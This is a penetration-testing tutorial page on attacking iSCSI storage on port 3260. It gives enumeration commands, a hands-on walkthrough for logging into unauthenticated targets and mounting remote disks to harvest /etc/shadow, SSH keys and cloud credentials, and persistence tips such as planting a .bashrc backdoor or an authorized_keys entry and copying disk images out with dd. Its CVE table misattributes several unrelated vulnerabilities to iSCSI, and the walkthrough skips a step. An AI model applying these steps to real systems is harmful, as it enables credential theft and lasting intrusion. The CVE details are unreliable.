iScsi - Port 3260

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

What is iSCSI and Why is it Important?

iSCSI (Internet Small Computer Systems Interface) is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in SAN (Storage Area Network) environments for centralized disk management and remote storage access.

Why iSCSI Matters in Security:

High-value targets: iSCSI often connects to critical infrastructure like databases and VMs.
Misconfigurations can lead to unauthenticated access or credential leaks.
Exposed iSCSI services can reveal disk images, file systems, and even credentials.

How iSCSI Works on Port 3260

Port 3260 handles the iSCSI target communication, where:

Initiators (clients) request access to storage blocks.
Targets (servers) expose storage resources via Logical Unit Numbers (LUNs).

iSCSI Protocol Flow:

Session Initiation via iSCSI login.
Discovery Phase: Client requests list of available targets.
Authentication: Optional but often skipped or weakly implemented.
Data Transfer: SCSI commands are encapsulated in TCP/IP.

Top Vulnerabilities in iSCSI

Below are common attack vectors in iSCSI deployments:

Vulnerability

Description

No Authentication

Default config allows any initiator to access targets.

Weak CHAP Credentials

Often reused or stored in plaintext.

Information Disclosure

Target names, volume names, and paths can leak sensitive info.

Exposure to the Internet

Misconfigured firewalls or open 3260 ports.

Unpatched CVEs

Older storage devices may run vulnerable firmware.

Enumeration Techniques with Tools (Nmap, Netcat, etc.)

Using Nmap

nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info

-p 3260: Scan the iSCSI port
--script=iscsi-info: Attempts to extract target name and LUNs

Netcat for Banner Grabbing

nc <target-ip> 3260

You may get a raw iSCSI response showing protocol version or session response.

iscsiadm (Linux)

iscsiadm -m discovery -t sendtargets -p <target-ip>

Lists available iSCSI targets.
Works only if no auth is required or credentials are known.

Manual Exploitation: Hands-On Examples

Step 1: Target Discovery

iscsiadm -m discovery -t sendtargets -p 10.10.10.22

Output:

10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1

iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login

If successful, the system will map the remote disk locally (e.g., /dev/sdb).

Step 3: Mount and Explore

fdisk -l
mount /dev/sdb1 /mnt
ls /mnt

Look for:

/etc/shadow files
Password backups
SSH keys
Configs containing internal IPs

Automated Exploitation with Tools

Metasploit iSCSI Modules

Metasploit has auxiliary modules for discovery:

msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run

Nikto (Limited)

While Nikto isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.

Custom Python Script Example

import socket

target = "10.10.10.22"
port = 3260

s = socket.socket()
s.connect((target, port))
s.send(b"InitiatorHello")
print(s.recv(1024))
s.close()

Real-World CVEs and Notable Exploits

CVE ID

Description

Link

CVE-2020-2732

iSCSI memory leak in certain Linux kernels

CVE-2015-1420

iSCSI stack buffer overflow in Netgear ReadyNAS

Exploit DB

CVE-2018-1000861

Remote command execution via iSCSI web management interface

Privilege Escalation Opportunities via this Service

Once access is gained to an iSCSI volume:

Look for saved credential files
- .bash_history, .ssh/id_rsa, /etc/shadow
Search for sudoers misconfigurations
```
cat /mnt/etc/sudoers
```
Enumerate LVM volumes for hidden partitions
```
lvscan
```

If LUNs expose full disk images, mount them locally and search for:

SAM/NTDS.dit (Windows)
MySQL databases
AWS credentials

Post-Exploitation Tips and Persistence

Techniques:

Leave a backdoor in iSCSI shared volume
- e.g., .bashrc modification
Enable remote access via hidden SSH key
- Inject key into /home/user/.ssh/authorized_keys
Exfiltrate disk image for offline cracking
```
dd if=/dev/sdb of=disk.img bs=1M
```

Defense, Mitigation, and Hardening Techniques

Best Practices:

Always enable CHAP authentication
Whitelist initiator IPs
Limit access with firewall rules (block 3260 externally)
Use VLANs or separate subnets for SAN traffic
Regularly patch iSCSI daemons and firmware

Monitoring Tips:

Use Wireshark to inspect unauthorized iSCSI sessions.
Set up Syslog alerts for unusual discovery requests.

📚 Recommended Books

The Hacker Playbook 3: Practical Guide To Penetration Testing

A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousSquid - Port 3128 NextSAPRouter - Port 3299

Last updated 1 month ago

Was this helpful?